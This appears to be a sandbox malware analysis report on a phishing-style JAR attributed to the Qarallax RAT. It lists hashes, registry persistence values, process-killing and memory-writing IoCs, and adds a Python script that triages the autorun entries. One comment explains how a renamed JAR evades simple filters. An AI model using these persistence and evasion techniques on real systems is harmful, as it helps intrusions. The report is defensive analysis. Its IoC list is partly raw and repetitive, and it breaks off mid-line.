Analysis
max time kernel: 149s
max time network: 143s
platform: windows7_x64
resource: win7v200722
submitted: 25-08-2020 10:27

Static task: static1

Behavioral task: behavioral1
Sample: Payment Advice Hsbc_pdf.jar
Resource: win7v200722 (windows7_x64)
0 signatures, 0 seconds

Behavioral task: behavioral2
Sample: Payment Advice Hsbc_pdf.jar
Resource: win10v200722 (windows10_x64)
0 signatures, 0 seconds
General
Target: Payment Advice Hsbc_pdf.jar
Size: 411KB
MD5: f202f81ea024be0ef950ff369bdf4087
SHA1: 4dbbfe69123c4d8348e61f06f1b6c78e6e685fca
SHA256: 0b81ff2995706809c70836bc77057db0e6b395c39f8e4623d354efcaa82f7480
SHA512: 99eff56986a915ca8ed5d301484e24b82d35745e17bfecf275e38705cb4e95f4a60b06930f2d01157905f843971f01b03613b0c79e92dc78ab269fe499271c54
Score: 10/10
Malware Config
Signatures
Qarallax RAT support DLL (1 IoC)
resource | yara_rule
behavioral1/files/0x0003000000013512-7.dat | qarallax_dll
Disables Task Manager via registry modification

Disables use of System Restore points (1 TTP)

Sets file execution options in registry (2 TTPs)
Loads dropped DLL (1 IoC)
pid | Process
1056 | java.exe
Adds Run key to start application (2 TTPs, 4 IoCs)
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce | java.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\HfdZkYR = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\ujTBR\\NXtxm.class\"" | java.exe
Key created | \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000\Software\Microsoft\Windows\CurrentVersion\Run | java.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000\Software\Microsoft\Windows\CurrentVersion\Run\HfdZkYR = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\ujTBR\\NXtxm.class\"" | java.exe
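The two "Set value (str)" rows above are the sample's persistence. The Python below is an added example, not part of this report and not the sandbox's own signature logic: it parses those two IoC lines exactly as the report prints them (the sandbox escapes quotes and backslashes inside the value data) and applies the checks an analyst would run over any Run/RunOnce entry. The checks themselves (launcher under a user profile, "-jar" pointing at a non-.jar file, random-looking names, the same value name under both Run and RunOnce) and their thresholds are the author's assumptions.

```python
"""Triage of the Run/RunOnce IoCs printed in the signature above.

Added example; not part of this report and not Triage's own logic. The
two input lines are copied verbatim from the report. The heuristics and
their thresholds are the author's assumptions.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

REPORT_IOCS = [
    r'Set value (str) \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\HfdZkYR = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\ujTBR\\NXtxm.class\"" java.exe',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000\Software\Microsoft\Windows\CurrentVersion\Run\HfdZkYR = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\ujTBR\\NXtxm.class\"" java.exe',
]

# key path, value name, quoted value data, writing process
IOC_RE = re.compile(
    r'^Set value \(str\) (?P<key>\\REGISTRY\\.+?)\\(?P<name>[^\\]+?) = '
    r'"(?P<data>.*)" (?P<proc>\S+)$'
)
USER_PROFILE = re.compile(r'^[A-Za-z]:\\Users\\', re.IGNORECASE)
JAVA_LAUNCHERS = {'java.exe', 'javaw.exe'}


@dataclass
class AutorunEntry:
    key: str
    name: str
    command: str
    process: str
    findings: list[str] = field(default_factory=list)


def parse_ioc(line: str) -> AutorunEntry:
    """Parse one 'Set value (str)' line and undo the sandbox's escaping
    of quotes and backslashes inside the value data."""
    m = IOC_RE.match(line)
    if not m:
        raise ValueError('not a Set value (str) IoC: ' + line)
    data = m['data'].replace('\\"', '"').replace('\\\\', '\\')
    return AutorunEntry(m['key'], m['name'], data, m['proc'])


def split_cmdline(cmd: str) -> list[str]:
    """Split a Windows command line on spaces, honouring double quotes."""
    return [q or u for q, u in re.findall(r'"([^"]*)"|(\S+)', cmd)]


def looks_random(token: str) -> bool:
    """Heuristic (assumption) for generated names: five or more letters
    with no vowel, or three or more upper/lower case flips."""
    letters = [c for c in token if c.isalpha()]
    if len(letters) < 5:
        return False
    flips = sum(a.isupper() != b.isupper() for a, b in zip(letters, letters[1:]))
    return flips >= 3 or not any(c in 'aeiouAEIOU' for c in letters)


def triage(entry: AutorunEntry) -> AutorunEntry:
    """Run the per-entry checks and record findings on the entry."""
    argv = split_cmdline(entry.command)
    exe = argv[0]
    if USER_PROFILE.match(exe):
        entry.findings.append('launcher lives under a user profile: ' + exe)
    if exe.rsplit('\\', 1)[-1].lower() in JAVA_LAUNCHERS and '-jar' in argv:
        i = argv.index('-jar')
        if i + 1 < len(argv) and not argv[i + 1].lower().endswith('.jar'):
            entry.findings.append('-jar argument is not a .jar file: ' + argv[i + 1])
    # value name plus every path component of every argument
    tokens = [entry.name] + [p for a in argv for p in re.split(r'[\\.]', a)]
    for t in tokens:
        if looks_random(t):
            entry.findings.append('random-looking name: ' + t)
    return entry


def triage_report(lines: list[str]) -> list[AutorunEntry]:
    """Triage every autorun IoC and flag a value name that is set under
    more than one autorun key (here both Run and RunOnce)."""
    entries = [triage(parse_ioc(line)) for line in lines]
    keys_by_name: dict[str, set[str]] = {}
    for e in entries:
        keys_by_name.setdefault(e.name, set()).add(e.key.rsplit('\\', 1)[-1])
    for e in entries:
        if len(keys_by_name[e.name]) > 1:
            e.findings.append('value %s set under %s'
                              % (e.name, ', '.join(sorted(keys_by_name[e.name]))))
    return entries


if __name__ == '__main__':
    for e in triage_report(REPORT_IOCS):
        print(e.key.rsplit('\\', 1)[-1], e.name, e.command)
        for f in e.findings:
            print('  -', f)
```

Each of the two entries yields five findings. The extension mismatch is a cue, not a reason to dismiss the entry: `javaw.exe -jar` opens the argument as a zip archive whatever its extension, so a JAR renamed to `.class` runs exactly as before while evading a naive `*.jar` filter. Setting the same value under Run and RunOnce gives the implant one guaranteed launch at the next logon (RunOnce is consumed then) plus a launch at every logon after that.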
Drops desktop.ini file(s) (4 IoCs)
description | ioc | Process
File opened for modification | C:\Users\Admin\ujTBR\Desktop.ini | attrib.exe
File opened for modification | C:\Users\Admin\ujTBR\Desktop.ini | attrib.exe
File opened for modification | C:\Users\Admin\ujTBR\Desktop.ini | java.exe
File created | C:\Users\Admin\ujTBR\Desktop.ini | java.exe
Drops file in System32 directory (2 IoCs)
description | ioc | Process
File created | C:\Windows\System32\rdBpT | java.exe
File opened for modification | C:\Windows\System32\rdBpT | java.exe
Kills process with taskkill (19 IoCs)
pid | Process
108 | taskkill.exe
1644 | taskkill.exe
1612 | taskkill.exe
1852 | taskkill.exe
1572 | taskkill.exe
1596 | taskkill.exe
112 | taskkill.exe
1832 | taskkill.exe
1840 | taskkill.exe
1560 | taskkill.exe
1476 | taskkill.exe
584 | taskkill.exe
1332 | taskkill.exe
2020 | taskkill.exe
2020 | taskkill.exe
376 | taskkill.exe
1920 | taskkill.exe
1996 | taskkill.exe
1084 | taskkill.exe
Suspicious behavior: EnumeratesProcesses (2 IoCs)
pid | Process
1896 | powershell.exe
1896 | powershell.exe
Suspicious use of AdjustPrivilegeToken (100 IoCs)
description | pid | Process
Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35 (the full set of 20, listed twice: 40 rows) | 1628 | WMIC.exe
Token: the same 20 privileges, again listed twice (40 rows) | 1112 | WMIC.exe
Token: SeDebugPrivilege | 1920 | taskkill.exe
Token: SeDebugPrivilege | 1996 | taskkill.exe
Token: SeDebugPrivilege | 584 | taskkill.exe
Token: SeDebugPrivilege | 112 | taskkill.exe
Token: SeDebugPrivilege | 1896 | powershell.exe
Token: SeDebugPrivilege | 108 | taskkill.exe
Token: SeDebugPrivilege | 1644 | taskkill.exe
Token: SeDebugPrivilege | 1612 | taskkill.exe
Token: SeDebugPrivilege | 1852 | taskkill.exe
Token: SeDebugPrivilege | 1332 | taskkill.exe
Token: SeDebugPrivilege | 1084 | taskkill.exe
Token: SeDebugPrivilege | 2020 | taskkill.exe
Token: SeDebugPrivilege | 1572 | taskkill.exe
Token: SeDebugPrivilege | 1832 | taskkill.exe
Token: SeDebugPrivilege | 2020 | taskkill.exe
Token: SeDebugPrivilege | 376 | taskkill.exe
Token: SeDebugPrivilege | 1596 | taskkill.exe
Token: SeDebugPrivilege | 1840 | taskkill.exe
Token: SeDebugPrivilege | 1560 | taskkill.exe
Token: SeDebugPrivilege | 1476 | taskkill.exe
Suspicious use of SetWindowsHookEx (1 IoC)
pid | Process
1056 | java.exe
Suspicious use of WriteProcessMemory (798 IoCs)
description | pid | Process | procid_target | rows
PID 1056 wrote to memory of 108 | 1056 | java.exe | 25 | ×3
PID 1056 wrote to memory of 908 | 1056 | java.exe | 26 | ×3
PID 908 wrote to memory of 1628 | 908 | cmd.exe | 27 | ×3
PID 1056 wrote to memory of 1120 | 1056 | java.exe | 28 | ×3
PID 1120 wrote to memory of 1112 | 1120 | cmd.exe | 29 | ×3
PID 1056 wrote to memory of 1716 | 1056 | java.exe | 30 | ×3
PID 1056 wrote to memory of 1820 | 1056 | java.exe | 31 | ×3
PID 1056 wrote to memory of 1268 | 1056 | java.exe | 32 | ×3
PID 1056 wrote to memory of 1832 | 1056 | java.exe | 33 | ×3
PID 1056 wrote to memory of 1784 | 1056 | java.exe | 34 | ×3
PID 1056 wrote to memory of 1776 | 1056 | java.exe | 35 | ×3
PID 1056 wrote to memory of 1664 | 1056 | java.exe | 36 | ×3
PID 1056 wrote to memory of 1652 | 1056 | java.exe | 37 | ×3
PID 1056 wrote to memory of 1572 | 1056 | java.exe | 38 | ×3
PID 1056 wrote to memory of 1896 | 1056 | java.exe | 39 | ×3
PID 1056 wrote to memory of 1860 | 1056 | java.exe | 40 | ×3
PID 1056 wrote to memory of 1864 | 1056 | java.exe | 41 | ×3
PID 1056 wrote to memory of 1920 | 1056 | java.exe | 42 | ×3
PID 1056 wrote to memory of 1944 | 1056 | java.exe | 44 | ×3
PID 1572 wrote to memory of 1908 | 1572 | cmd.exe | 46 | ×3
PID 1056 wrote to memory of 1984 | 1056 | java.exe | 47 | ×3
PID 1056 wrote to memory of 2036 | 1056 | java.exe | 48 | ×3
PID 1056 wrote to memory of 2028 | 1056 | java.exe | 49 | ×3
PID 1056 wrote to memory of 376 | 1056 | java.exe | 50 | ×3
PID 1056 wrote to memory of 576 | 1056 | java.exe | 51 | ×3
PID 1056 wrote to memory of 760 | 1056 | java.exe | 52 | ×3
PID 1056 wrote to memory of 2004 | 1056 | java.exe | 53 | ×3
PID 1056 wrote to memory of 1136 | 1056 | java.exe | 55 | ×3
PID 1056 wrote to memory of 1500 | 1056 | java.exe | 56 | ×3
PID 1056 wrote to memory of 860 | 1056 | java.exe | 57 | ×3
PID 1056 wrote to memory of 1076 | 1056 | java.exe | 58 | ×3
PID 1056 wrote to memory of 112 | 1056 | java.exe | 62 | ×3
PID 1056 wrote to memory of 1060 | 1056 | java.exe | 63 | ×3
PID 1056 wrote to memory of 1100 | 1056 | java.exe | 65 | ×3
PID 1056 wrote to memory of 1520 | 1056 | java.exe | 66 | ×3
PID 1056 wrote to memory of 772 | 1056 | java.exe | 69 | ×3
PID 1056 wrote to memory of 1380 | 1056 | java.exe | 70 | ×3
PID 1056 wrote to memory of 1800 | 1056 | java.exe | 72 | ×3
PID 1056 wrote to memory of 1796 | 1056 | java.exe | 73 | ×3
PID 1056 wrote to memory of 1792 | 1056 | java.exe | 74 | ×3
PID 1056 wrote to memory of 1592 | 1056 | java.exe | 75 | ×3
PID 1056 wrote to memory of 1568 | 1056 | java.exe | 86 | ×3
PID 1056 wrote to memory of 1340 | 1056 | java.exe | 87 | ×3
PID 1056 wrote to memory of 1996 | 1056 | java.exe | 88 | ×3
PID 1056 wrote to memory of 796 | 1056 | java.exe | 89 | ×3
PID 1056 wrote to memory of 1812 | 1056 | java.exe | 91 | ×3
PID 1056 wrote to memory of 536 | 1056 | java.exe | 92 | ×3
PID 1056 wrote to memory of 824 | 1056 | java.exe | 93 | ×3
PID 1056 wrote to memory of 1268 | 1056 | java.exe | 94 | ×3
PID 1056 wrote to memory of 1608 | 1056 | java.exe | 96 | ×3
PID 1572 wrote to memory of 1972 | 1572 | cmd.exe | 111 | ×3
PID 1056 wrote to memory of 1060 | 1056 | java.exe | 112 | ×3
PID 1060 wrote to memory of 624 | 1060 | cmd.exe | 113 | ×3
PID 1060 wrote to memory of 1084 | 1060 | cmd.exe | 114 | ×3
PID 1056 wrote to memory of 660 | 1056 | java.exe | 115 | ×3
PID 660 wrote to memory of 1928 | 660 | cmd.exe | 116 | ×3
PID 660 wrote to memory of 1380 | 660 | cmd.exe | 117 | ×3
PID 1056 wrote to memory of 2000 | 1056 | java.exe | 118 | ×3
PID 2000 wrote to memory of 1488 | 2000 | cmd.exe | 119 | ×3
PID 1056 wrote to memory of 584 | 1056 | java.exe | 120 | ×3
PID 2000 wrote to memory of 1336 | 2000 | cmd.exe | 121 | ×3
PID 1056 wrote to memory of 2004 | 1056 | java.exe | 123 | ×3
PID 2004 wrote to memory of 2020 | 2004 | cmd.exe | 124 | ×3
PID 2004 wrote to memory of 1612 | 2004 | cmd.exe | 125 | ×3
PID 1056 wrote to memory of 1496 | 1056 | java.exe | 126 | ×3
PID 1496 wrote to memory of 2008 | 1496 | cmd.exe | 127 | ×3
PID 1496 wrote to memory of 1840 | 1496 | cmd.exe | 128 | ×3
PID 1056 wrote to memory of 1916 | 1056 | java.exe | 129 | ×3
PID 1916 wrote to memory of 1628 | 1916 | cmd.exe | 130 | ×3
PID 1916 wrote to memory of 2012 | 1916 | cmd.exe | 131 | ×3
PID 1056 wrote to memory of 1804 | 1056 | java.exe | 132 | ×3
PID 1804 wrote to memory of 1568 | 1804 | cmd.exe | 133 | ×3
PID 1804 wrote to memory of 744 | 1804 | cmd.exe | 134 | ×3
PID 1056 wrote to memory of 1716 | 1056 | java.exe | 135 | ×3
PID 1716 wrote to memory of 1268 | 1716 | cmd.exe | 136 | ×3
PID 1716 wrote to memory of 1264 | 1716 | cmd.exe | 137 | ×3
PID 1056 wrote to memory of 1368 | 1056 | java.exe | 138 | ×3
PID 1368 wrote to memory of 576 | 1368 | cmd.exe | 139 | ×3
PID 1368 wrote to memory of 1864 | 1368 | cmd.exe | 140 | ×3
PID 1056 wrote to memory of 1036 | 1056 | java.exe | 141 | ×3
PID 1056 wrote to memory of 112 | 1056 | java.exe | 142 | ×3
PID 1036 wrote to memory of 1988 | 1036 | cmd.exe | 143 | ×3
PID 1036 wrote to memory of 1944 | 1036 | cmd.exe | 145 | ×3
PID 1056 wrote to memory of 2044 | 1056 | java.exe | 146 | ×3
PID 2044 wrote to memory of 2036 | 2044 | cmd.exe | 147 | ×3
PID 2044 wrote to memory of 2024 | 2044 | cmd.exe | 148 | ×3
PID 1056 wrote to memory of 240 | 1056 | java.exe | 149 | ×3
PID 240 wrote to memory of 1216 | 240 | cmd.exe | 150 | ×3
PID 240 wrote to memory of 1996 | 240 | cmd.exe | 151 | ×3
PID 1056 wrote to memory of 1848 | 1056 | java.exe | 152 | ×3
PID 1848 wrote to memory of 1928 | 1848 | cmd.exe | 153 | ×3
PID 1848 wrote to memory of 1656 | 1848 | cmd.exe | 154 | ×3
PID 1056 wrote to memory of 1100 | 1056 | java.exe | 155 | ×3
PID 1100 wrote to memory of 748 | 1100 | cmd.exe | 156 | ×3
PID 1100 wrote to memory of 1952 | 1100 | cmd.exe | 157 | ×3
PID 1056 wrote to memory of 1592 | 1056 | java.exe | 158 | ×3
PID 1592 wrote to memory of 2020 | 1592 | cmd.exe | 159 | ×3
PID 1592 wrote to memory of 2008 | 1592 | cmd.exe | 160 | ×3
PID 1056 wrote to memory of 108 | 1056 | java.exe | 161 | ×3
PID 1056 wrote to memory of 1908 | 1056 | java.exe | 163 | ×3
PID 1908 wrote to memory of 552 | 1908 | cmd.exe | 164 | ×3
PID 1908 wrote to memory of 892 | 1908 | cmd.exe | 165 | ×3
PID 1056 wrote to memory of 1332 | 1056 | java.exe | 166 | ×3
PID 1332 wrote to memory of 744 | 1332 | cmd.exe | 167 | ×3
PID 1332 wrote to memory of 536 | 1332 | cmd.exe | 168 | ×3
PID 1056 wrote to memory of 1264 | 1056 | java.exe | 169 | ×3
PID 1264 wrote to memory of 1912 | 1264 | cmd.exe | 170 | ×3
PID 1056 wrote to memory of 1644 | 1056 | java.exe | 171 | ×3
PID 1264 wrote to memory of 2040 | 1264 | cmd.exe | 173 | ×3
PID 1056 wrote to memory of 2024 | 1056 | java.exe | 174 | ×3
PID 2024 wrote to memory of 1008 | 2024 | cmd.exe | 175 | ×3
PID 2024 wrote to memory of 1968 | 2024 | cmd.exe | 176 | ×3
PID 1056 wrote to memory of 860 | 1056 | java.exe | 177 | ×3
PID 860 wrote to memory of 1860 | 860 | cmd.exe | 178 | ×3
PID 860 wrote to memory of 112 | 860 | cmd.exe | 179 | ×3
PID 1056 wrote to memory of 1380 | 1056 | java.exe | 180 | ×3
PID 1380 wrote to memory of 1796 | 1380 | cmd.exe | 181 | ×3
PID 1380 wrote to memory of 1336 | 1380 | cmd.exe | 182 | ×3
PID 1056 wrote to memory of 748 | 1056 | java.exe | 183 | ×3
PID 1056 wrote to memory of 1612 | 1056 | java.exe | 184 | ×3
PID 748 wrote to memory of 1624 | 748 | cmd.exe | 185 | ×3
PID 748 wrote to memory of 684 | 748 | cmd.exe | 186 | ×3
PID 1056 wrote to memory of 1368 | 1056 | java.exe | 188 | ×3
PID 1368 wrote to memory of 1520 | 1368 | cmd.exe | 189 | ×3
PID 1368 wrote to memory of 1572 | 1368 | cmd.exe | 190 | ×3
PID 1056 wrote to memory of 1812 | 1056 | java.exe | 191 | ×3
PID 1812 wrote to memory of 660 | 1812 | cmd.exe | 192 | ×3
PID 1812 wrote to memory of 1804 | 1812 | cmd.exe | 193 | ×3
PID 1056 wrote to memory of 1112 | 1056 | java.exe | 194 | ×3
PID 1112 wrote to memory of 1840 | 1112 | cmd.exe | 195 | ×3
PID 1112 wrote to memory of 1640 | 1112 | cmd.exe | 196 | ×3
PID 1056 wrote to memory of 1664 | 1056 | java.exe | 197 | ×3
PID 1664 wrote to memory of 552 | 1664 | cmd.exe | 198 | ×3
PID 1664 wrote to memory of 760 | 1664 | cmd.exe | 199 | ×3
PID 1056 wrote to memory of 1692 | 1056 | java.exe | 200 | ×3
PID 1692 wrote to memory of 1780 | 1692 | cmd.exe | 201 | ×3
PID 1692 wrote to memory of 752 | 1692 | cmd.exe | 202 | ×3
PID 1056 wrote to memory of 1788 | 1056 | java.exe | 203 | ×3
PID 1788 wrote to memory of 1652 | 1788 | cmd.exe | 204 | ×3
PID 1056 wrote to memory of 1852 | 1056 | java.exe | 205 | ×3
PID 1788 wrote to memory of 1936 | 1788 | cmd.exe | 207 | ×3
PID 1056 wrote to memory of 1608 | 1056 | java.exe | 208 | ×3
PID 1608 wrote to memory of 1216 | 1608 | cmd.exe | 209 | ×3
PID 1608 wrote to memory of 1824 | 1608 | cmd.exe | 210 | ×3
PID 1056 wrote to memory of 1928 | 1056 | java.exe | 211 | ×3
PID 1928 wrote to memory of 1796 | 1928 | cmd.exe | 212 | ×3
PID 1928 wrote to memory of 1624 | 1928 | cmd.exe | 213 | ×3
PID 1056 wrote to memory of 1708 | 1056 | java.exe | 214 | ×3
PID 1708 wrote to memory of 1520 | 1708 | cmd.exe | 215 | ×3
PID 1708 wrote to memory of 1088 | 1708 | cmd.exe | 216 | ×3
PID 1056 wrote to memory of 824 | 1056 | java.exe | 217 | ×3
PID 824 wrote to memory of 2000 | 824 | cmd.exe | 218 | ×3
PID 824 wrote to memory of 2044 | 824 | cmd.exe | 219 | ×3
PID 1056 wrote to memory of 660 | 1056 | java.exe | 220 | ×3
PID 660 wrote to memory of 2008 | 660 | cmd.exe | 221 | ×3
PID 660 wrote to memory of 2012 | 660 | cmd.exe | 222 | ×3
PID 1056 wrote to memory of 1640 | 1056 | java.exe | 223 | ×3
PID 1640 wrote to memory of 480 | 1640 | cmd.exe | 224 | ×3
PID 1640 wrote to memory of 760 | 1640 | cmd.exe | 225 | ×3
PID 1056 wrote to memory of 2032 | 1056 | java.exe | 226 | ×3
PID 2032 wrote to memory of 1492 | 2032 | cmd.exe | 227 | ×3
PID 2032 wrote to memory of 1568 | 2032 | cmd.exe | 228 | ×3
PID 1056 wrote to memory of 2028 | 1056 | java.exe | 229 | ×3
PID 1056 wrote to memory of 1332 | 1056 | java.exe | 230 | ×3
PID 2028 wrote to memory of 1448 | 2028 | cmd.exe | 232 | ×3
PID 2028 wrote to memory of 1552 | 2028 | cmd.exe | 233 | ×3
PID 1056 wrote to memory of 892 | 1056 | java.exe | 234 | ×3
PID 892 wrote to memory of 1596 | 892 | cmd.exe | 235 | ×3
PID 892 wrote to memory of 108 | 892 | cmd.exe | 236 | ×3
PID 1056 wrote to memory of 1652 | 1056 | java.exe | 237 | ×3
PID 1652 wrote to memory of 1984 | 1652 | cmd.exe | 238 | ×3
PID 1652 wrote to memory of 764 | 1652 | cmd.exe | 239 | ×3
PID 1056 wrote to memory of 1376 | 1056 | java.exe | 240 | ×3
PID 1376 wrote to memory of 1924 | 1376 | cmd.exe | 241 | ×3
PID 1376 wrote to memory of 1824 | 1376 | cmd.exe | 242 | ×3
PID 1056 wrote to memory of 1996 | 1056 | java.exe | 243 | ×3
PID 1996 wrote to memory of 1644 | 1996 | cmd.exe | 244 | ×3
PID 1996 wrote to memory of 1852 | 1996 | cmd.exe | 245 | ×3
PID 1056 wrote to memory of 1656 | 1056 | java.exe | 246 | ×3
PID 1656 wrote to memory of 1336 | 1656 | cmd.exe | 247 | ×3
PID 1656 wrote to memory of 1808 | 1656 | cmd.exe | 248 | ×3
PID 1056 wrote to memory of 1632 | 1056 | java.exe | 249 | ×3
PID 1632 wrote to memory of 1036 | 1632 | cmd.exe | 250 | ×3
PID 1632 wrote to memory of 1572 | 1632 | cmd.exe | 251 | ×3
PID 1056 wrote to memory of 1084 | 1056 | java.exe | 252 | ×3
PID 1056 wrote to memory of 1972 | 1056 | java.exe | 254 | ×3
PID 1972 wrote to memory of 1804 | 1972 | cmd.exe | 255 | ×3
PID 1972 wrote to memory of 1960 | 1972 | cmd.exe | 256 | ×3
PID 1056 wrote to memory of 1900 | 1056 | java.exe | 257 | ×3
PID 1900 wrote to memory of 1948 | 1900 | cmd.exe | 258 | ×3
PID 1900 wrote to memory of 1920 | 1900 | cmd.exe | 259 | ×3
PID 1056 wrote to memory of 1840 | 1056 | java.exe | 260 | ×3
PID 1840 wrote to memory of 1584 | 1840 | cmd.exe | 261 | ×3
PID 1840 wrote to memory of 480 | 1840 | cmd.exe | 262 | ×3
PID 1056 wrote to memory of 1780 | 1056 | java.exe | 263 | ×3
PID 1780 wrote to memory of 1120 | 1780 | cmd.exe | 264 | ×3
PID 1780 wrote to memory of 1568 | 1780 | cmd.exe | 265 | ×3
PID 1056 wrote to memory of 1112 | 1056 | java.exe | 266 | ×3
PID 1112 wrote to memory of 1496 | 1112 | cmd.exe | 267 | ×3
PID 1112 wrote to memory of 1552 | 1112 | cmd.exe | 268 | ×2, third repeat cut off
(the list is cut off in the source at this row; the signature reports 798 rows in total)
1552 1112 cmd.exe 268 PID 1056 wrote to memory of 1812 1056 java.exe 269 PID 1056 wrote to memory of 1812 1056 java.exe 269 PID 1056 wrote to memory of 1812 1056 java.exe 269 PID 1812 wrote to memory of 556 1812 cmd.exe 270 PID 1812 wrote to memory of 556 1812 cmd.exe 270 PID 1812 wrote to memory of 556 1812 cmd.exe 270 PID 1812 wrote to memory of 1340 1812 cmd.exe 271 PID 1812 wrote to memory of 1340 1812 cmd.exe 271 PID 1812 wrote to memory of 1340 1812 cmd.exe 271 PID 1056 wrote to memory of 1628 1056 java.exe 272 PID 1056 wrote to memory of 1628 1056 java.exe 272 PID 1056 wrote to memory of 1628 1056 java.exe 272 PID 1628 wrote to memory of 1596 1628 cmd.exe 273 PID 1628 wrote to memory of 1596 1628 cmd.exe 273 PID 1628 wrote to memory of 1596 1628 cmd.exe 273 PID 1628 wrote to memory of 1936 1628 cmd.exe 274 PID 1628 wrote to memory of 1936 1628 cmd.exe 274 PID 1628 wrote to memory of 1936 1628 cmd.exe 274 PID 1056 wrote to memory of 1844 1056 java.exe 275 PID 1056 wrote to memory of 1844 1056 java.exe 275 PID 1056 wrote to memory of 1844 1056 java.exe 275 PID 1844 wrote to memory of 764 1844 cmd.exe 276 PID 1844 wrote to memory of 764 1844 cmd.exe 276 PID 1844 wrote to memory of 764 1844 cmd.exe 276 PID 1844 wrote to memory of 1216 1844 cmd.exe 277 PID 1844 wrote to memory of 1216 1844 cmd.exe 277 PID 1844 wrote to memory of 1216 1844 cmd.exe 277 PID 1056 wrote to memory of 112 1056 java.exe 278 PID 1056 wrote to memory of 112 1056 java.exe 278 PID 1056 wrote to memory of 112 1056 java.exe 278 PID 112 wrote to memory of 1912 112 cmd.exe 279 PID 112 wrote to memory of 1912 112 cmd.exe 279 PID 112 wrote to memory of 1912 112 cmd.exe 279 PID 112 wrote to memory of 1644 112 cmd.exe 280 PID 112 wrote to memory of 1644 112 cmd.exe 280 PID 112 wrote to memory of 1644 112 cmd.exe 280 PID 1056 wrote to memory of 1820 1056 java.exe 281 PID 1056 wrote to memory of 1820 1056 java.exe 281 PID 1056 wrote to memory of 1820 1056 java.exe 281 PID 1820 wrote to memory of 684 
1820 cmd.exe 282 PID 1820 wrote to memory of 684 1820 cmd.exe 282 PID 1820 wrote to memory of 684 1820 cmd.exe 282 PID 1820 wrote to memory of 1808 1820 cmd.exe 283 PID 1820 wrote to memory of 1808 1820 cmd.exe 283 PID 1820 wrote to memory of 1808 1820 cmd.exe 283 PID 1056 wrote to memory of 2004 1056 java.exe 284 PID 1056 wrote to memory of 2004 1056 java.exe 284 PID 1056 wrote to memory of 2004 1056 java.exe 284 PID 2004 wrote to memory of 1520 2004 cmd.exe 285 PID 2004 wrote to memory of 1520 2004 cmd.exe 285 PID 2004 wrote to memory of 1520 2004 cmd.exe 285 PID 2004 wrote to memory of 1612 2004 cmd.exe 286 PID 2004 wrote to memory of 1612 2004 cmd.exe 286 PID 2004 wrote to memory of 1612 2004 cmd.exe 286 PID 1056 wrote to memory of 2020 1056 java.exe 287 PID 1056 wrote to memory of 2020 1056 java.exe 287 PID 1056 wrote to memory of 2020 1056 java.exe 287 PID 1056 wrote to memory of 1116 1056 java.exe 288 PID 1056 wrote to memory of 1116 1056 java.exe 288 PID 1056 wrote to memory of 1116 1056 java.exe 288 PID 1116 wrote to memory of 2044 1116 cmd.exe 290 PID 1116 wrote to memory of 2044 1116 cmd.exe 290 PID 1116 wrote to memory of 2044 1116 cmd.exe 290 PID 1116 wrote to memory of 1916 1116 cmd.exe 291 PID 1116 wrote to memory of 1916 1116 cmd.exe 291 PID 1116 wrote to memory of 1916 1116 cmd.exe 291 PID 1056 wrote to memory of 584 1056 java.exe 292 PID 1056 wrote to memory of 584 1056 java.exe 292 PID 1056 wrote to memory of 584 1056 java.exe 292 PID 584 wrote to memory of 1524 584 cmd.exe 293 PID 584 wrote to memory of 1524 584 cmd.exe 293 PID 584 wrote to memory of 1524 584 cmd.exe 293 PID 584 wrote to memory of 1584 584 cmd.exe 294 PID 584 wrote to memory of 1584 584 cmd.exe 294 PID 584 wrote to memory of 1584 584 cmd.exe 294 PID 1056 wrote to memory of 1672 1056 java.exe 295 PID 1056 wrote to memory of 1672 1056 java.exe 295 PID 1056 wrote to memory of 1672 1056 java.exe 295 PID 1672 wrote to memory of 1120 1672 cmd.exe 296 PID 1672 wrote to memory of 1120 
1672 cmd.exe 296 PID 1672 wrote to memory of 1120 1672 cmd.exe 296 PID 1672 wrote to memory of 1908 1672 cmd.exe 297 PID 1672 wrote to memory of 1908 1672 cmd.exe 297 PID 1672 wrote to memory of 1908 1672 cmd.exe 297 PID 1056 wrote to memory of 1136 1056 java.exe 298 PID 1056 wrote to memory of 1136 1056 java.exe 298 PID 1056 wrote to memory of 1136 1056 java.exe 298 PID 1136 wrote to memory of 1552 1136 cmd.exe 299 PID 1136 wrote to memory of 1552 1136 cmd.exe 299 PID 1136 wrote to memory of 1552 1136 cmd.exe 299 PID 1136 wrote to memory of 1368 1136 cmd.exe 300 PID 1136 wrote to memory of 1368 1136 cmd.exe 300 PID 1136 wrote to memory of 1368 1136 cmd.exe 300 PID 1056 wrote to memory of 2024 1056 java.exe 301 PID 1056 wrote to memory of 2024 1056 java.exe 301 PID 1056 wrote to memory of 2024 1056 java.exe 301 PID 2024 wrote to memory of 108 2024 cmd.exe 302 PID 2024 wrote to memory of 108 2024 cmd.exe 302 PID 2024 wrote to memory of 108 2024 cmd.exe 302 PID 2024 wrote to memory of 1596 2024 cmd.exe 303 PID 2024 wrote to memory of 1596 2024 cmd.exe 303 PID 2024 wrote to memory of 1596 2024 cmd.exe 303 PID 1056 wrote to memory of 1576 1056 java.exe 304 PID 1056 wrote to 